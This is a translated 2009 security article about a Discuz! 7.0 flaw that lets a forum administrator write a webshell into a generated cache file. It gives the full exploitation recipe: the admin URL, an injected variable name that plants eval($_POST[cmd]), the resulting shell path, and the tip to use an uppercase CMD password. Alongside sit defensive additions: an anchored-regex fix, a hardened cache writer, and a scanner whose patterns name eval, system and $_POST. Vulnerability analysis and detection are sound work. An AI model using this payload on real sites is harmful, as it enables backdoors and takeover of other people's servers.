Discuz! 7.0 and below: getting a webshell from the backend without founder privileges (vulnerability warning) - the black bar safety net

ID MYHACK58:62200923893
Type myhack58
Reporter 佚名
Modified 2009-07-15T00:00:00


Author: oldjun

I rarely pay attention to this kind of vulnerability; I have rarely gone after sites, and when I come across DZ it is mostly just in passing, so I never paid much attention to DZ vulnerabilities or studied its code. Not long ago a forum was left with a shell; I spent half a day investigating it, and since I ran into it anyway, I'm putting it out here for everyone's convenience.

Let me state up front: 1. This is not my discovery. Plenty of experts found it long ago, but nobody published it; ring04h seems to have a write-up: <http://ring04h.googlepages.com/dzshell.txt>. Probably many people know about it; I study too little and learned of it late, to my shame. 2. I learned from the IIS logs of the forum that had been shelled that this spot could be exploited, namely the file styles.inc.php, and then read down through it to find the way it was used. Later flyh4t reminded me that it is actually the same as ring04h's method, so I am behind the times...

Enough talk; look at the code:

PHP code

```php
<?php
// ......
if($newcvar && $newcsubst) {
    if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
        cpmsg('styles_edit_variable_duplicate', '', 'error');
    } elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
        cpmsg('styles_edit_variable_illegal', '', 'error');
    }
    $newcvar = strtolower($newcvar);
    $db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
        VALUES ('$id', '$newcvar', '$newcsubst')");
} // Insert the variable data  From www.oldjun.com
// ......
updatecache('styles'); // update the cache and write the files  From www.oldjun.com
// ......
?>
```

This is the code for adding a style variable. The variable name and value are stored in the database; although the posted data goes through daddslashes, once it is in the database it is plain data again.

Here there is a regular-expression question, the check on the variable name: `!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)`, where `\x7f-\xff` refers to the characters with byte values 127 to 255, which is where the first byte of a Chinese character usually falls, so it serves to match Chinese. At first glance this pattern only allows variable names made of letters or Chinese characters and nothing else, but I just tested the following, and in the general case this regex is equivalent to no check at all:

PHP code

```php
<?php
// Minimal test harness for the pattern above; the variable name comes from the query string.
$newcvar = isset($_GET['newcvar']) ? $_GET['newcvar'] : '';
echo htmlspecialchars($newcvar); // escaped so the test page itself does not reflect raw input
echo "<br>";
if(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
    echo "haha";
} else {
    echo 'pass';
}
?>
```
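To make the "no check at all" point concrete, here is an added example (not code from Discuz! or from the original article) that runs the pattern as written against a few constructed inputs and, beside it, the anchored form that actually constrains the whole string. looseCheck() and validateVarName() are names chosen for this example:

```php
<?php
// Added example, not Discuz! code. It shows why the unanchored pattern from
// styles.inc.php accepts almost anything, and what an anchored replacement
// looks like. looseCheck() and validateVarName() are names chosen here.

// The pattern as written in styles.inc.php: no anchors, so preg_match() succeeds
// as soon as ANY substring of the input looks like an identifier.
function looseCheck($name) {
    return preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $name) === 1;
}

// Same character classes, but \A and \z force the WHOLE string to match.
// (\z rather than $ because $ would still tolerate one trailing newline.)
function validateVarName($name) {
    return preg_match("/\A[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\z/", $name) === 1;
}

// Constructed inputs. Only the first two are legitimate variable names; the loose
// check passes every one of the rest because each contains an identifier somewhere.
$samples = array(
    'headerbg',
    '标题颜色',            // Chinese text: bytes 0x7f-0xff are deliberately allowed
    '9abc',               // leading digit, but "abc" inside satisfies the loose check
    "color', 'red');",    // closes the quote and the statement around it
    "ok\n",               // trailing newline, the classic ^...$ pitfall
    "',x",                // quote first, identifier later
);

foreach ($samples as $s) {
    printf("%-22s loose=%-6s anchored=%s\n",
        json_encode($s),
        looseCheck($s) ? 'pass' : 'reject',
        validateVarName($s) ? 'pass' : 'reject');
}
```

Run it with the PHP CLI; the loose column reads "pass" for every sample except none at all (even the quote-first input contains an identifier), while the anchored column rejects everything but the first two. The fix in a real code base is the anchored pattern, applied before the name is stored rather than only before it is written to the cache.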

Next, look at the updatecache function in include/cache.func.php. It first reads the data from the database, does some processing, and finally writes it to a file. I won't describe the whole thing, only the key point; look at this function:

PHP code

```php
function getcachevars($data, $type = 'VAR') {
    $evaluate = '';
    foreach($data as $key => $val) {
        if(is_array($val)) {
            $evaluate .= "\$$key = ".arrayeval($val).";\n";
        } else {
            $val = addcslashes($val, '\'\\');
            $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
        }
    }
    return $evaluate;
}
```

No need to say more: the value is escaped but the key is not, and this key is exactly the variable name we submitted earlier, which sits in the database unescaped. On array keys, you can refer to the "advanced PHP code auditing techniques" article in issue 3 of Phantom Brigade magazine, which discusses key problems in several places; DZ ignored that here...
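As an added example (not Discuz! code), here is a hardened stand-in for getcachevars() that closes the gap the paragraph describes: every key must be a plain identifier (the original pattern with anchors), and every value is emitted with var_export() instead of hand-built quoting. safeCacheVars() and CacheKeyException are names chosen for this example:

```php
<?php
// Added example, not Discuz! code: a hardened stand-in for getcachevars().
// The original escapes $val with addcslashes() but interpolates $key unescaped
// into the generated PHP. Here every key must be a plain identifier, and every
// value is emitted with var_export(), which produces a correctly quoted literal
// for strings and arrays alike. safeCacheVars() and CacheKeyException are
// names chosen for this example.

class CacheKeyException extends Exception {}

function safeCacheVars(array $data, $type = 'VAR') {
    $evaluate = '';
    foreach ($data as $key => $val) {
        // Anchored form of the original identifier pattern. An integer key
        // ("0", "1", ...) fails too, which is what we want for named variables.
        if (!preg_match("/\A[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*\z/", (string) $key)) {
            // A bad key means the database row was tampered with: refuse to
            // generate code rather than write it into the cache file.
            throw new CacheKeyException('refusing unsafe cache key ' . json_encode($key));
        }
        $literal = var_export($val, true);
        $evaluate .= $type == 'VAR'
            ? "\$$key = $literal;\n"
            : "define('" . strtoupper($key) . "', $literal);\n";
    }
    return $evaluate;
}

// Constructed sample rows. The value with the embedded quote is handled by
// var_export(); the hostile key is rejected before any code is generated.
$benign = array('headerbg' => '#ffffff', 'slogan' => "it's fine");
echo safeCacheVars($benign, 'CONST');

$hostile = array("x', '#999');//" => '1111');
try {
    echo safeCacheVars($hostile, 'CONST');
} catch (CacheKeyException $e) {
    echo 'blocked: ' . $e->getMessage() . "\n";
}
```

Throwing rather than silently skipping the key is deliberate: a row that fails the identifier check should stop the cache rebuild and be logged, because it only gets there if the input validation upstream was bypassed.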

So you can take a shell directly. To use it, replace the forum address with your own. First log into the backend with an administrator account (you do not need to be the forum founder; administrator level is enough): http://www.oldjun.com/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1 Below there is a "custom template variables" section; in the variable name field, fill in:

PHP code

```
OLDJUN', '#999');eval($_POST[cmd]);//
```

Fill in anything for the substitution content, e.g. 1111, then submit, and the one-line backdoor is generated at: http://www.oldjun.com/bbs/forumdata/cache/style_1.php

If the style id you modify is 2, then the corresponding shell is style_2.php.

Style templates can also be imported and exported, which is what ring04h's dzshell relies on; if you want to skip the manual steps, you can simply import a style to get a shell.
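From the defender's side, the cache directory named above is the place to look. The following added example (not Discuz! code) scans generated cache files for lines that a data-only cache should never contain. It assumes, consistent with the author's note that variable names are uppercased, that a style cache is a series of define() lines; suspiciousPatterns(), scanCacheSource() and findSuspiciousCacheFiles() are names chosen for this example:

```php
<?php
// Added example, not Discuz! code: a scanner for the generated cache files in
// forumdata/cache/. Assumption: a healthy cache file holds nothing but data
// assignments, so any line that calls a code-execution function or reads request
// input is suspicious. suspiciousPatterns(), scanCacheSource() and
// findSuspiciousCacheFiles() are names chosen for this example.

function suspiciousPatterns() {
    return array(
        // code execution (case-insensitive: strtoupper() on the key turns eval into EVAL)
        '/\b(eval|assert|system|exec|passthru|shell_exec|popen|proc_open|create_function)\s*\(/i',
        // anything reading request data has no business in a data cache
        '/\$_(POST|GET|REQUEST|COOKIE|FILES)\b/',
        '/\$GLOBALS\s*\[/',
    );
}

// Returns the suspicious lines of one file's source as line number plus text.
function scanCacheSource($source, $patterns = null) {
    if ($patterns === null) {
        $patterns = suspiciousPatterns();
    }
    $hits = array();
    foreach (explode("\n", $source) as $i => $line) {
        foreach ($patterns as $re) {
            if (preg_match($re, $line)) {
                $hits[] = array('line' => $i + 1, 'text' => rtrim($line));
                break;
            }
        }
    }
    return $hits;
}

// Walks a cache directory and reports every file with at least one hit.
function findSuspiciousCacheFiles($dir) {
    $report = array();
    foreach (glob(rtrim($dir, '/') . '/*.php') as $path) {
        $hits = scanCacheSource(file_get_contents($path));
        if ($hits) {
            $report[$path] = $hits;
        }
    }
    return $report;
}

// Constructed sample: the define() lines getcachevars() emits for a style, with
// the injected line the article describes (after strtoupper() on the key).
$sample = "<?php\n"
    . "define('HEADERBG', '#ffffff');\n"
    . "define('OLDJUN', '#999');EVAL(\$_POST[CMD]);//', '1111');\n"
    . "define('FONTSIZE', '12px');\n"
    . "?>";

foreach (scanCacheSource($sample) as $hit) {
    echo "line {$hit['line']}: {$hit['text']}\n";
}

// Against a live install, point it at the cache directory, for example:
//   print_r(findSuspiciousCacheFiles('/path/to/bbs/forumdata/cache'));
```

A cron job running findSuspiciousCacheFiles() against forumdata/cache, together with the backend access log entries for admincp.php?action=styles, gives both detection of a planted cache file and the audit trail of which administrator account created it.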

Note: a lot of people reported that the one-liner did not respond, and I found that my article left out one thing:

PHP code

```php
$evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
```

This line converts all variable names to uppercase!

So please use uppercase CMD as the password for your one-liner!